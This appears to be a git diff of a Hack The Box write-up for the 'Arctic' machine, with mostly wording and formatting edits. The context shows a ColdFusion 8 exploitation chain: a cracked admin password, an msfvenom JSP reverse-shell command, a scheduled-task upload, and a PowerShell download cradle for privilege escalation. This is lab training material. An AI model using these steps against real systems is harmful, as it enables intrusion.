Updated arctic post

--- a/_posts/HackTheBox/2020-04-13-arctic.md
+++ b/_posts/HackTheBox/2020-04-13-arctic.md
@@ -8,7 +8,7 @@ image: htb/arctic/arctic.png
 
 # Introduction
 
-Arctic is a Windows machine on Hackthebox.
+Arctic is an "easy" Windows machine on Hackthebox.
 
 
 # Reconnaissance & Enumeration
@@ -54,7 +54,7 @@ Navigating through the directory I came across an Adobe ColdFusion8 admin portal
 | :--: |
 | *Adobe ColdFusion8 web portal* |
 
-Searching information about Adobe ColdFusion 8, it came out in July 2007 and the latest version is now ColdFusion 2018 so I’m confident that it’s vulnerable. ColdFusion uses its own server-side markup language (CFML) and the application itself was wrote in Java but to verify this we can view the HTTP headers using CURL.
+Searching information about Adobe ColdFusion 8, it came out in July 2007 and the latest version is now ColdFusion 2018. ColdFusion uses its own server-side markup language (CFML) and the application itself was wrote in Java but to verify this we can view the HTTP headers using CURL.
 
 | ![image]({{site.github.url}}/assets/img/htb/arctic/httpheaders.png) |
 | :--: |
@@ -69,13 +69,13 @@ The exploit gives us the ability to read file paths using these parameters! Read
 | :--: |
 | *The directory path returned a hashed password on the webpage* |
 
-The portal shows a hashed password that I could attempt to crack. You can use John the ripper or various websites. I used crackstation.net and it successfully cracked the password which turned out to be “happyday”. Logging into the portal you can see everything about the server from “Settings Summary” under Server Setting tab. The info shows the server is running on Windows Vista and I came across important default file paths.
+The portal shows a hashed password that I could attempt to crack. You can use John the ripper or various websites. I used crackstation.net and it successfully cracked the password which turned out to be **happyday**. Logging into the portal you can see everything about the server from “Settings Summary” under Server Setting tab. The info shows the server is running on Windows Vista and I came across important default file paths.
 
 | ![image]({{site.github.url}}/assets/img/htb/arctic/mappings.png) |
 | :--: |
-| *Important directory mappings. If get to upload files to the server we'll use these default file paths* |
+| *Important directory mappings. If we get to upload files to the server we'll use these default file paths* |
 
-On the admin portal there is an option for “Scheduled Tasks” which gives us the ability to execute a task from a remote URL! Reverse shell task coming up. We know the server handles CFML and JSP from our reconnaissance so we can decide on a web shell (CFML) or a complete shell to the machine (JSP), I went for a complete shell but the CFML webshells are under **/usr/share/webshells/cfm** on Kali. Save the task to a file called shell.jsp using the default file path mappings above so we can execute that file from ```http://10.10.10.11/CFIDE/<file>```
+On the admin portal there is an option for “Scheduled Tasks” which gives us the ability to execute a task from a remote URL! Lovely. We know the server handles CFML and JSP so we can decide on a web shell (CFML) or a complete shell to the machine (JSP), I went for a complete shell but the CFML webshells are under **/usr/share/webshells/cfm** on Kali. Save the task to a file called shell.jsp using the default file path mappings above so we can execute that file from ```http://10.10.10.11/CFIDE/<file>```
 
 | ![image]({{site.github.url}}/assets/img/htb/arctic/task.png) |
 | :--: |
@@ -93,7 +93,7 @@ root@kali:~/Documents/boxes/arctic/share# msfvenom -p java/jsp_shell_reverse_tcp
 
 # Privilege Escalation
 
-If you run systeminfo you can see its running on Windows 2008 and there hasn’t been any patches carried out on the machine. Using Windows Exploit Suggester to find an escalation vulnerability: 
+If you run ```systeminfo``` you can see its running on Windows 2008 and there hasn’t been any patches carried out on the machine. Using Windows Exploit Suggester to find an escalation vulnerability: 
 
 ```bash
 root@kali:~/Documents/boxes/arctic# python windows-exploit-suggester.py --database 2020-04-10-mssb.xls --systeminfo systeminfo.txt --quiet
@@ -130,6 +130,7 @@ C:\Users\tolis\Desktop>powershell.exe -c "(New-Object System.Net.WebClient).Down
 | :--: |
 | *Running the exploit* |
 
-| ![image]({{site.github.url}}/assets/img/htb/arctic/root.png) |
-| :--: |
-| *Boom, root privelleges.* |
+![image]({{site.github.url}}/assets/img/htb/arctic/root.png) |
+
+
+Boom, root privelleges.
